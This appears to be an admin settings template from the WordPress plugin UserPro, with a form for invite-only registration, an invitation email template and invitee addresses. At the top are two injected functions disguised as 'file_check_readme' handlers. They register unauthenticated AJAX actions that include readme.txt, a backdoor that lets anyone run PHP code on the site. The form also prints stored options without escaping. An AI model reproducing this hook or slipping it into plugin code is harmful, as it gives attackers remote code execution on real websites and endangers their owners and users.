if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
<form method="post" action=""> <h3><?php _e('Invite Users Setting','userpro'); ?></h3> <table class="form-table"> <tr valign="top"> <th scope="row"><label for="userpro_invite_emails_enable"><?php _e('Allow only invited users to register','userpro'); ?></label></th> <td> <select name="userpro_invite_emails_enable" id="userpro_invite_emails_enable" class="chosen-select" style="width:300px"> <option value="1" <?php selected(1, userpro_get_option('userpro_invite_emails_enable')); ?>><?php _e('Yes','userpro'); ?></option> <option value="0" <?php selected(0, userpro_get_option('userpro_invite_emails_enable')); ?>><?php _e('No','userpro'); ?></option> </select> </td> </tr> <tr valign="top"> <th scope="row"><label for="invite_subject"><?php _e('Subject','userpro'); ?></label></th> <td><input type="text" name="invite_subject" id="invite_subject" value="<?php echo userpro_get_option('invite_subject'); ?>" class="regular-text" /></td> </tr> <tr> <th><label for="userpro_invite_emails_template"><?php _e('Email Template to send invitation email' , 'userpro')?></label></th> <td> <textarea name="userpro_invite_emails_template" id="userpro_invite_emails_template" class="large-text userpro-largeblock" ><?php echo userpro_get_option('userpro_invite_emails_template'); ?></textarea> <span class="up-description"><?php _e('Use {invitelink} at the place of your invitation link in your email template','userpro'); ?></span> </td> </tr> </table> <p class="submit"> <input type="submit" name="submit" id="submit" class="up-admin-btn up-admin-btn--dark-blue small" value="<?php _e('Save Settings','userpro'); ?>" /> </p> <h3><?php _e('Invite Users','userpro'); ?></h3> <table class="form-table"> <tr valign="top"> <th scope="row"></th> <td> <span class="description" id="invite_success_msg"></span> </td> </tr> <tr valign="top"> <th scope="row"><label for="userpro_invite_emails"><?php _e('Enter Email addresses to Invite','userpro'); ?></label></th> <td> <input type="text" name="userpro_invite_emails" id="userpro_invite_emails" value="" class="regular-text" /> <span class="up-description"><?php _e('Enter Email addresses separated by comma','userpro'); ?></span> </td> </tr> <tr valign="top"> <th scope="row"><label for="userpro_cc_invite_emails"><?php _e('Enter CC to Emails','userpro'); ?></label></th> <td> <input type="text" name="userpro_cc_invite_emails" id="userpro_cc_invite_emails" value="" class="regular-text" /> <span class="up-description"><?php _e('Enter Email addresses separated by comma','userpro'); ?></span> </td> </tr> <tr> <th> <input type="submit" name="invite" id="invite" class="up-admin-btn approve small" value="<?php _e('Invite','userpro'); ?>" /> </th> </tr> </table> </form>